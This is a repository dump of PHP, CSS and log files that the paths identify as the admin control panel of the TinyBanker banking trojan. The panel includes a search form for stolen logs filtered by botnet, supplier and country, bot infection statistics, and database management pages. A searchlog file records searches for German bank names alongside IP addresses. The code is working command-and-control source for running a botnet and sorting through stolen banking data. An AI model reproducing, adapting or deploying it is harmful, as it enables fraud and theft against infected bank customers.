include "logs.search.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "logs.parser.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "logs.patterns.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

124
malwares/Source/Original/TinyBanker_Jan2012/admin/control/logs.search.php Normal file
View File

@@ -0,0 +1,124 @@
<?php
if (!BOT) exit();
print "<!-- Search form begin -->
<div id='searchformdiv'>
<form>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td class='srchopt'>Logs IDs:</td>
<td colspan=3><input type='text' name='logs_ids'></td>
<td rowspan=7 width=250px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Geolocation</div>
<select name='geolocation[]' multiple style='height:125px;display:none;'><optgroup label='CONTINENTS'>";
reset($GEOIP_CONTINENT_NAMES);
while ($val = current($GEOIP_CONTINENT_NAMES)) {
$key = key($GEOIP_CONTINENT_NAMES);
print "<option value=X{$key}>[{$key}] {$val}</option>";
next($GEOIP_CONTINENT_NAMES);
}
print "</optgroup><optgroup label='COUNTRIES'>";
for ($i=0; $i<count($GeoIP->GEOIP_COUNTRY_CODES); $i++) print "<option value={$GeoIP->GEOIP_COUNTRY_CODES[$i]}>[{$GeoIP->GEOIP_COUNTRY_CODES[$i]}] {$GeoIP->GEOIP_COUNTRY_NAMES[$i]}</option>";
print "</optgroup></select>
</td>
<td rowspan=7 width=200px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Data types</div>
<select name='datatypes[]' multiple style='height:125px;display:none;'>";
for ($i=1; $i<count($DATA_TYPES); $i++) print "<option value={$i}>{$DATA_TYPES[$i]}</option>";
print "</select>
</td>
<td rowspan=7 width=200px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Botnets</div>
<select name='botnets[]' multiple style='height:125px;display:none;'>";
reset($BOTNETS);
while ($val = current($BOTNETS)) {
$key = key($BOTNETS);
print "<option value={$key}>[ {$key} ]</option>";
next($BOTNETS);
}
print "</select>
</td>
<td rowspan=7 width=200px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Suppliers</div>
<select name='suppliers[]' multiple style='height:125px;display:none;'>";
reset($SUPPLIERS);
while ($val = current($SUPPLIERS)) {
$key = key($SUPPLIERS);
print "<option value={$key}>[ {$key} ]</option>";
next($SUPPLIERS);
}
print "</select>
</td>
</tr>
<tr>
<td class='srchopt'>Bots UIDs:</td>
<td colspan=3><input type='text' name='bots_uids'></td>
</tr>\n\n";
$OPTIONS = '';
rsort($LOGSTABLES);
reset($LOGSTABLES);
while ($val = current($LOGSTABLES)) {
$dispval = $val{9}.$val{10}.'.'.$val{7}.$val{8}.'.20'.$val{5}.$val{6};
$OPTIONS .= "<option value='{$val}'>{$dispval}</option>";
next($LOGSTABLES);
}
print " <tr>
<td class='srchopt' width=70px>From date:</td>
<td><select name='from_date'>{$OPTIONS}</select></td>
<td class='srchopt' width=50px>To date:</td>
<td><select name='to_date'>{$OPTIONS}</select></td>
</tr>
<tr>
<td class='srchopt'>From time:</td>
<td><input type='text' name='from_time'></td>
<td class='srchopt'>To time:</td>
<td><input type='text' name='to_time'></td>
</tr>
<tr>
<td class='srchopt'>IP mask:</td>
<td colspan=3><input type='text' name='ip_mask[]' maxlength=3 class='srchnum'>.<input type='text' name='ip_mask[]' maxlength=3 class='srchnum'>.<input type='text' name='ip_mask[]' maxlength=3 class='srchnum'>.<input type='text' name='ip_mask[]' maxlength=3 class='srchnum'></td>
</tr>
<tr>
<td class='srchopt'>Phrase:</td>
<td colspan=3><input type='text' name='phrase'></td>
</tr>
<tr>
<td class='srchopt'>Limit:</td>
<td colspan=2>
<input type='text' name='limit' value='999' maxlength=3 class='srchnum'>
</td>
<td>
<input type='submit' value='Search &raquo;&raquo;&raquo;' class='srchbtn'>
</td>
</tr>
</table>
</form>
</div>
<!-- Search form end -->
<div id='searchresultdiv'></div>
<script>
$('#searchformdiv form').submit(function() {
var zis = $(this);
$(zis).find(':submit').attr('disabled', true);
$('#searchresultdiv').empty().html('<center><img src=\"images/loading.gif\"></center>');
$.post('?logs', $(zis).serialize(), function(data){
$(zis).find(':submit').attr('disabled', false);
$('#searchresultdiv').css({'display':'none'}).empty().html(data).fadeIn();
});
return false;
});
</script>\n\n\n";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/plugins.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/plugins.correlation.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "correlation";
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/plugins.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "plugins.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Plugins</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Correlation</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>XXX</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "plugins.plugins.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "plugins.correlation.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "plugins.xxx.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/plugins.plugins.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "plugins";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/plugins.xxx.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "xxx";
?>

9266
malwares/Source/Original/TinyBanker_Jan2012/admin/control/scripts/jquery.js vendored Normal file
View File

File diff suppressed because it is too large Load Diff

6
malwares/Source/Original/TinyBanker_Jan2012/admin/control/searchlog.txt Normal file
View File

@@ -0,0 +1,6 @@
24.04.2012 14:11:31 212.117.172.100 pareq
24.04.2012 19:29:55 212.117.172.100 pareq
24.04.2012 19:30:07 212.117.172.100 comdirect
24.04.2012 19:31:03 212.117.172.100 dkb
24.04.2012 19:32:07 212.117.172.100 bank
24.04.2012 19:33:27 92.112.54.100 int test

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/settings.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/settings.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "settings.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>settings1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>settings2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>settings3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "settings.settings1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "settings.settings2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "settings.settings3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/settings.settings1.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "settings1";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/settings.settings2.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "settings2";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/settings.settings3.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "settings3";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/stats.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/stats.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "stats.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>stats1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>stats2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>stats3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "stats.stats1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "stats.stats2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "stats.stats3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/stats.stats1.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "stats1";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/stats.stats2.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "stats2";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/stats.stats3.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "stats3";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/status.act.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/status.countries.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "countries";
?>

62
malwares/Source/Original/TinyBanker_Jan2012/admin/control/status.php Normal file
View File

@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "status.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Summary</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Countries</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Server</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "status.summary.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "status.countries.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "status.server.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/status.server.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "server";
?>

101
malwares/Source/Original/TinyBanker_Jan2012/admin/control/status.summary.php Normal file
View File

@@ -0,0 +1,101 @@
<?php
if (!BOT) exit();
$time = time();
$totalbots = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots`;"));
$newbots24 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_birth`>".($time-24*60*60)));
$newbots1 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_birth`>".($time-1*60*60)));
$active24 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`>".($time-24*60*60)));
$active6 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`>".($time-6*60*60)));
$active1 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`>".($time-1*60*60)));
$inactive72 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`<".($time-72*60*60)));
$inactive48 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`<".($time-48*60*60)));
$inactive24 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`<".($time-24*60*60)));
print "<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=15% class='title'>Total BOTs:</td>
<td width=5% class='value'>{$totalbots[0]}</td>
<td width=15% class='title'>Active BOTs within 24h:</td>
<td width=5% class='value'>{$active24[0]}</td>
<td width=15% class='title'>Inactive BOTs more 72h:</td>
<td width=5% class='value'>{$inactive72[0]}</td>
<td width=15% class='title'>Average BOTs activity:</td>
<td width=5% class='value'>???</td>
<td width=15% class='title'>!!!:</td>
<td width=5% class='value'>???</td>
</tr>
<tr>
<td class='title'>New BOTs 24h:</td>
<td class='value'>{$newbots24[0]}</td>
<td class='title'>Active BOTs within 6h:</td>
<td class='value'>{$active6[0]}</td>
<td class='title'>Inactive BOTs more 48h:</td>
<td class='value'>{$inactive48[0]}</td>
<td class='title'>Average BOTs lifetime:</td>
<td class='value'>???</td>
<td class='title'>!!!:</td>
<td class='value'>???</td>
</tr>
<tr>
<td class='title'>New BOTs 1h:</td>
<td class='value'>{$newbots1[0]}</td>
<td class='title'>Active BOTs within 1h:</td>
<td class='value'>{$active1[0]}</td>
<td class='title'>Inactive BOTs more 24h:</td>
<td class='value'>{$inactive24[0]}</td>
<td class='title'>!!!:</td>
<td class='value'>???</td>
<td class='title'>!!!:</td>
<td class='value'>???</td>
</tr>
</table>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td width=11% class='title'>Win 8 x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win Seven x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win 2k8 x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win Vista x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win 2k3 x32:</td>
<td width=4% class='value'>???</td>
<td width=9% class='title'>Win XP x32:</td>
<td width=4% class='value'>???</td>
<td width=11% class='title'>Total x32:</td>
<td width=5% class='value'>???</td>
</tr>
<tr>
<td class='title'>Win 8 x64:</td>
<td class='value'>???</td>
<td class='title'>Win Seven x64:</td>
<td class='value'>???</td>
<td class='title'>Win 2k8 x64:</td>
<td class='value'>???</td>
<td class='title'>Win Vista x64:</td>
<td class='value'>???</td>
<td class='title'>Win 2k3 x64:</td>
<td class='value'>???</td>
<td class='title'>Win XP x64:</td>
<td class='value'>???</td>
<td class='title'>Total x64:</td>
<td class='value'>???</td>
</tr>
</table>";
?>

375
malwares/Source/Original/TinyBanker_Jan2012/admin/control/styles/dark.css Normal file
View File

@@ -0,0 +1,375 @@
body {
color: #708070;
background: #151518;
font-family: Tahoma;
font-size: 11px;
padding: 5px;
margin: 0;
scrollbar-face-color: #060909;
scrollbar-track-color: #222222;
scrollbar-arrow-color: #4B7B8B;
scrollbar-shadow-color: #121212;
scrollbar-3dlight-color: #202020;
scrollbar-highlight-color: #060909;
scrollbar-darkshadow-color: #202020;
}
div {
overflow:hidden;
white-space:nowrap;
}
form {
padding: 0;
margin: 0;
}
textarea,
select,
input {
width: 100%;
color: #709090;
background: #252528;
border: 1px solid #404050;
font-family: Tahoma;
font-size: 11px;
margin: 0px;
}
/****************************************\
|** MAIN **|
\****************************************/
.wrap {
width: 1250px;
background: #171C1D;
border: 2px solid #404050;
margin: 0 0 3px 0;
font-family: Tahoma;
font-size: 11px;
}
.menu {
text-align: center;
padding: 5px 0 10px 0;
}
.menu a:link,
.menu a:active,
.menu a:visited {
color: #708090;
background: #252528;
border: 1px solid #404050;
font-weight: bold;
text-decoration: none;
padding: 2px 10px;
margin: 1px;
cursor: default;
}
.menu a:hover {
color: #E05000;
background: #090909;
border: 1px solid #E05000;
}
.block {
width: 100%;
color: #708090;
background: #151518;
border: 1px solid #404050;
margin: 0 0 2px 0;
font-family: Tahoma;
font-size: 11px;
}
/****************************************\
|** TABS **|
\****************************************/
.tab_act {
font-weight: bold;
border: 0px solid #404050;
border-width: 2px 1px 0 0;
font-family: Tahoma;
font-size: 11px;
}
.tab_psv {
font-weight: bold;
border: 0px solid #404050;
border-width: 1px 1px 2px 0;
font-family: Tahoma;
font-size: 11px;
}
.tab_act a:link,
.tab_act a:active,
.tab_act a:visited {
padding: 0 20px;
color: #709070;
background: #171C1D;
text-decoration: none;
cursor: default;
}
.tab_psv a:link,
.tab_psv a:active,
.tab_psv a:visited {
padding: 0px 20px;
color: #708090;
background: #252528;
text-decoration: none;
cursor: default;
}
.tab_psv a:hover {
background:#171C1D;
color:#E05000;
}
.no_tab {
width: 100%;
border-bottom: 2px solid #404050;
font-size: 1px;
}
.tabcont {
width: 100%;
padding: 2px 2px 0 2px;
font-weight: bold;
font-family: Tahoma;
font-size: 11px;
}
/****************************************\
|** SUMMARY **|
\****************************************/
/* Status #################### */
.title {
text-align: right;
font-weight: bold;
background: #252528;
color: #808070;
height: 18px;
padding-right: 5px;
}
.value {
text-align: left;
background: #1A2020;
color: #708070;
padding-left: 5px;
}
/****************************************\
|** BOTNETS **|
\****************************************/
.bothdr {
text-align: center;
font-weight: bold;
background: #252528;
color: #808070;
height: 18px;
}
.botstr {
text-align: center;
background: #1A2020;
color: #708070;
}
.botleft {
text-align: left;
padding: 0 2px 0 2px;
}
/****************************************\
|** SEARCH **|
\****************************************/
/* Search form #################### */
.srchopt {
text-align: right;
font-weight: bold;
background: #252528;
color: #709090;
padding: 0 3px;
height: 17px;
}
.srchbox {
text-align: center;
font-weight: bold;
background: #252528;
color: #709080;
}
.srchnum {
text-align: center;
width: 30px;
}
.srchbtn {
font-weight: bold;
}
.srchbtn[disabled] {
background: #E05000;
}
/* Result #################### */
.button {
font-weight: bold;
margin: 0 2px 2px 0;
padding: 1px 10px;
width: auto;
}
.button[disabled] {
background: #E05000;
}
.highlight {
font-weight: bold;
color: #C04000;
}
.srchlight {
font-weight: bold;
background: #FFFFFF;
}
.hdrslight {
font-weight: bold;
color: #999999;
}
.varslight {
font-weight: bold;
color: #000000;
}
.briefrow0,
.briefrow1 {
font-size: 11px;
cursor: default;
}
.briefrow0 {
background: #1A2020;
color: #808090;
}
.briefrow1 {
background: #1A1D1A;
color: #808090;
}
.logrow0,
.logrow1 {
font-size: 11px;
}
.logrow0 {
background: #2A3030;
color: #808090;
}
.logrow1 {
background: #2A2D2A;
color: #808090;
}
.loghlt {
background: #E05000;
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
.briefcell {
width: 604px;
cursor: pointer;
overflow:hidden;
white-space:nowrap;
}

349
malwares/Source/Original/TinyBanker_Jan2012/admin/control/styles/Копия dark.css Normal file
View File

@@ -0,0 +1,349 @@
body {
color: #709090;
background: #151518;
font-family: Tahoma;
font-size: 11px;
font-weight: bold;
padding: 5px;
margin: 0;
scrollbar-face-color: #060909;
scrollbar-track-color: #222222;
scrollbar-arrow-color: #4B7B8B;
scrollbar-shadow-color: #121212;
scrollbar-3dlight-color: #202020;
scrollbar-highlight-color: #060909;
scrollbar-darkshadow-color: #202020;
}
form {
padding: 0;
margin: 0;
}
textarea,
select,
input {
width: 100%;
height: 100%;
color: #709090;
background: #252528;
border: 1px solid #404050;
font-family: Tahoma;
font-size: 11px;
margin: 0;
}
table {
font-family: Tahoma;
font-size: 11px;
}
table tr td {
vertical-align: top;
}
div {
overflow:hidden;
white-space:nowrap;
}
/****************************************\
|** MAIN **|
\****************************************/
.menu {
text-align: center;
padding: 5px 0 10px 0;
}
.menu a:link,
.menu a:active,
.menu a:visited {
color: #709080;
background: #252528;
border: 1px solid #404050;
font-weight: bold;
text-decoration: none;
padding: 2px 10px;
margin: 1px;
cursor: default;
}
.menu a:hover {
color: #E05000;
background: #090909;
border: 1px solid #E05000;
}
.wrap {
width: 1200px;
background: #171C1D;
border: 2px solid #404050;
margin: 0 0 3px 0;
}
.block {
width: 100%;
color: #709090;
background: #151518;
border: 1px solid #404050;
margin: 0 0 2px 0;
}
/****************************************\
|** TABS **|
\****************************************/
.tab_act {
font-size: 11px;
font-weight: bold;
border: 0px solid #404050;
border-width: 2px 1px 0 0;
}
.tab_psv {
font-size: 11px;
font-weight: bold;
border: 0px solid #404050;
border-width: 1px 1px 2px 0;
}
.tab_act a:link,
.tab_act a:active,
.tab_act a:visited {
cursor: default;
padding: 0 20px;
color: #709080;
background: #171C1D;
text-decoration: none;
}
.tab_psv a:link,
.tab_psv a:active,
.tab_psv a:visited {
cursor: default;
padding: 0px 20px;
color: #709090;
background: #252528;
text-decoration: none;
}
.tab_psv a:hover {
background:#171C1D;
color:#E05000;
}
.no_tab {
width: 100%;
font-size: 0;
border-bottom: 2px solid #404050;
}
.cont {
font-family: Tahoma;
font-size: 11px;
width: 100%;
padding: 2px 2px 0 2px;
}
/****************************************\
|** SEARCH **|
\****************************************/
/* Search form #################### */
.srchopt {
text-align: right;
font-weight: bold;
background: #252528;
color: #709090;
padding: 0 3px;
height: 17px;
}
.srchbox {
text-align: center;
font-weight: bold;
background: #252528;
color: #709080;
}
.srchnum {
text-align: center;
width: 30px;
}
.srchbtn {
font-weight: bold;
padding: 1px 10px;
width: auto;
}
.srchbtn[disabled] {
background: #E05000;
}
/* Result #################### */
.button {
font-weight: bold;
margin: 0 2px 2px 0;
padding: 1px 10px;
width: auto;
}
.button[disabled] {
background: #E05000;
}
.highlight {
font-weight: bold;
color: #C04000;
}
.varslight {
font-weight: bold;
color: #000000;
}
.srchlight {
font-weight: bold;
background: #FFFFFF;
}
.brief {
cursor: pointer;
}
.briefrow0,
.briefrow1 {
font-size: 11px;
cursor: default;
}
.briefrow0 {
background: #1A2020;
color: #808090;
}
.briefrow1 {
background: #1A1D1A;
color: #808090;
}
.logrow0,
.logrow1 {
font-size: 11px;
}
.logrow0 {
background: #2A3030;
color: #808090;
}
.logrow1 {
background: #2A2D2A;
color: #808090;
}
.loghlt {
background: #E05000;
}
/****************************************\
|** BOTNETS **|
\****************************************/
.bothdr {
text-align: center;
font-weight: bold;
background: #252528;
color: #709090;
height: 18px;
}
.botstr {
text-align: center;
background: #1A2020;
color: #709090;
}
.botleft {
text-align: left;
padding: 0 2px 0 2px;
}
/****************************************\
|** STATUS **|
\****************************************/
.valname {
text-align: right;
font-weight: bold;
background: #252528;
color: #709090;
height: 18px;
padding-right: 5px;
}
.valval {
text-align: left;
background: #1A2020;
color: #709090;
padding-left: 5px;
}

19
malwares/Source/Original/TinyBanker_Jan2012/admin/control/system.act.php Normal file
View File

@@ -0,0 +1,19 @@
<?php
if (!BOT) exit();
if (isset($_POST['killproc'])) {
foreach($_POST['kill_id'] as $id) mysql_query("KILL ".intval($id));
exit('success');
}
if (isset($_POST['dbact'])) {
exit(file_get_contents('php://input'));
}
exit();
?>

8
malwares/Source/Original/TinyBanker_Jan2012/admin/control/system.apache.php Normal file
View File

@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "apache";
?>

108
malwares/Source/Original/TinyBanker_Jan2012/admin/control/system.mysql.php Normal file
View File

@@ -0,0 +1,108 @@
<?php
if (!BOT) exit();
$result = mysql_query("SHOW TABLE STATUS");
print "<form id='dbact'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td></td>
<td>Name</td>
<td>Rows</td>
<td>Data Length</td>
<td>Index Length</td>
<td>Trash</td>
</tr>";
while($row = mysql_fetch_array($result)){
print " <tr class='botstr'>
<td width=14px><input type='checkbox' name='manage_name[]' value='{$row['Name']}'></td>
<td>{$row['Name']}</td>
<td>{$row['Rows']}</td>
<td>".round($row['Data_length']/1024/1024, 2)." MB / ".round($row['Max_data_length']/1024/1024/1024, 2)." GB</td>
<td>".round($row['Index_length']/1024/1024, 2)." MB</td>
<td>".round($row['Data_free']/1024/1024, 2)." MB</td>
</tr>";
}
print "</table>
<select name='action' class='button'>
<option value='optimize'>Optimize</option><option value='truncate'>Truncate</option><option value='drop'>Drop</option>
</select><input type='submit' class='button' value='Go'>
</form>
<script>
$('#dbact').submit(function() {
var frm = $(this);
var req = $(frm).serialize();
if (req == '') { alert('Select something first'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?system', 'dbact=&' + req, function(data) {
alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>";
$result = mysql_query("SHOW PROCESSLIST");
print "<form id='killproc'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td></td>
<td>ID</td>
<td>User</td>
<td>Host</td>
<td>DB</td>
<td>Command</td>
<td>Time</td>
<td>State</td>
<td>Info</td>
</tr>\n\n";
while($row = mysql_fetch_array($result)){
print " <tr class='botstr'>
<td width=14px><input type='checkbox' name='kill_id[]' value='$row[Id]'></td>
<td>$row[Id]</td>
<td>$row[User]</td>
<td>$row[Host]</td>
<td>$row[db]</td>
<td>$row[Command]</td>
<td>".date('H:i:s',$row['Time'])."</td>
<td>$row[State]</td>
<td>$row[Info]</td>
</tr>";
};
print "</table>
<input type='submit' class='button' value='Kill Threads'>
</form>
<script>
$('#killproc').submit(function() {
var frm = $(this);
var req = $(frm).serialize();
if (req == '') { alert('Select something first'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?system', 'killproc=&' + req, function(data) {
if (data == 'success') $(frm).find('input:checked').parent().parent().remove();
else alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>";
?>

77
malwares/Source/Original/TinyBanker_Jan2012/admin/control/system.php Normal file
View File

@@ -0,0 +1,77 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "system.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Server</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Apache</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>PHP</a></td>
<td nowrap class=tab_psv id='tl_4'><a href='javascript:sel(4);'>MySQL</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
